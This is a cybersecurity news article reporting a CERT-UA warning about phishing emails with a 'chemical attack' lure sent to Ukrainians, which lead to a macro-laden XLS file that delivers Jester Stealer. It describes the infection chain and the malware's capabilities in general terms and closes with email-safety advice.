Weaponized Document to Deliver Jester Stealer

The Computer Emergency Response Team of Ukraine (CERT-UA) has recently issued a warning about the mass distribution of malicious emails targeting Ukrainian citizens.

The CERT-UA advisory says, “If you open the document and activate the macro, the latter will download and run the EXE file, which will soon damage the computer with the malicious program JesterStealer. It is noted that executable files are downloaded from compromised web resources”.

How the Chemical Attack Carried Out

The emails have the subject line “chemical attack” and warn Ukrainian that information has been received that indicates chemical weapons will be used at 01:00, and that the authorities are not alerting the public to the threat so as not to cause panic.

The emails claim to provide information on where the chemical weapons will be used and the location of shelters where people will be safe. That information is provided in a document, a link to which is included in the email.

Upon clicking the link, the user will be directed to an XLS spreadsheet hosted on a compromised website. The XLS spreadsheet holds a malicious macro that runs if the document is opened and the content is enabled. The macro delivers an .EXE payload from a remote server and executes that file, which delivers Jester malware.

Jester Stealer Malware

This malware can steal and exfiltrate login credentials, cookies, crypto wallets, passwords stored in browsers, messages in email clients, IM chat data, and other information.

It also has anti-analysis features to sense when it is in a sandbox or virtual machine and lacks a mechanism for persistence, so will be removed after its operations have been performed and the program is closed. Experts say that there is no mechanism to ensure resistance – after closing the program is removed.

Macros in the attached document fetching the malware payload

There is a suspicion if this could be an attack from the pro-Russian hacking group or from a cybercriminal gang. Since Jester malware is widely available and is licensed at $99 per month or $249 for lifetime use, the campaign is unlikely to have been conducted by a nation-state threat actor.

Since the invasion of Ukraine, the citizens are highly vigilant and they are living with the fear of chemical weapon attacks, so there is a high possibility that the emails will be opened. Apart from of the significance of the threat outlined in an email, it is very essential to follow email security best practices and not to follow links or open email attachments in unsolicited emails.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.